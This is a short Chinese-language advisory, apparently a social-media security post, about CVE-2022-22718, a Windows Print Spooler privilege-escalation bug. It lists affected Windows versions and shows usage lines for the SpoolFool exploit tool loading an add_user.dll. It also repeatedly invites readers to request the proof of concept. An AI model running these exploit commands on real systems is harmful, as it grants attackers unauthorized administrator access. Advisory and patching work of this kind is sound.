影响范围
-
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
-
Windows Server 2008 for x64-based Systems Service Pack 2
-
Windows 7 for 32-bit Systems Service Pack 1
-
Windows Server 2016 (Server Core installation)
-
Windows Server 2016
-
Windows 10 Version 1607 for x64-based Systems
-
Windows 10 Version 1607 for 32-bit Systems
-
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
-
Windows Server 2008 for 32-bit Systems Service Pack 2
-
Windows RT 8.1
-
Windows 8.1 for x64-based systems
-
Windows 8.1 for 32-bit systems
-
Windows 7 for x64-based Systems Service Pack 1
-
Windows 10 for x64-based Systems
-
Windows 10 for 32-bit Systems
-
Windows 10 Version 21H2 for x64-based Systems
-
Windows 10 Version 21H1 for x64-based Systems
-
Windows 10 Version 1909 for ARM64-based Systems
-
Windows 10 Version 1909 for x64-based Systems
-
Windows 10 Version 1909 for 32-bit Systems
-
Windows Server 2012 R2 (Server Core installation)
-
Windows Server 2012 R2
-
Windows Server 2012 (Server Core installation)
-
Windows Server 2012
-
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
-
Windows Server 2008 R2 for x64-based Systems Service Pack 1
-
Windows 10 Version 21H2 for ARM64-based Systems
-
Windows 10 Version 21H2 for 32-bit Systems
-
Windows 11 for ARM64-based Systems
-
Windows 11 for x64-based Systems
-
Windows Server, version 20H2 (Server Core Installation)
-
Windows 10 Version 20H2 for ARM64-based Systems
-
Windows 10 Version 20H2 for 32-bit Systems
-
Windows 10 Version 20H2 for x64-based Systems
-
Windows Server 2022 Azure Edition Core Hotpatch
-
Windows Server 2022 (Server Core installation)
-
Windows Server 2022
-
Windows 10 Version 21H1 for 32-bit Systems
-
Windows 10 Version 21H1 for ARM64-based Systems
-
Windows Server 2019 (Server Core installation)
-
Windows Server 2019
-
Windows 10 Version 1809 for ARM64-based Systems
-
Windows 10 Version 1809 for x64-based Systems
-
Windows 10 Version 1809 for 32-bit Systems
漏洞类型
本地权限提升
利用条件
影响范围应用
漏洞概述
2022年02月09日,微软发布了安全更新,修复了48个安全漏洞(不包括22个Microsoft Edge漏洞),其中CVE-2022-22718为Windows后台打印程序特权提升漏洞,CVSS评分7.7
漏洞复现
使用说明:
PS C:\SpoolFool> .\SpoolFool.exeSpoolFoolBy Oliver Lyak (@ly4k_)Examples:C:\SpoolFool\SpoolFool.exe -dll add_user.dllC:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
powershell:
PS C:\SpoolFool> ipmo .\SpoolFool.ps1PS C:\SpoolFool> Invoke-SpoolFoolSpoolFoolBy Oliver Lyak (@ly4k_)Examples:-dll add_user.dll-dll add_user.dll -printer 'My Printer'-dll add_user.dll -dir 'SECRET'-dll add_user.dll -printer 'My Printer' -dir 'SECRET'
安全建议
升级到最新版本~
后台回复"Print Spooler",获取POC
后台回复"Print Spooler",获取POC
后台回复"Print Spooler",获取POC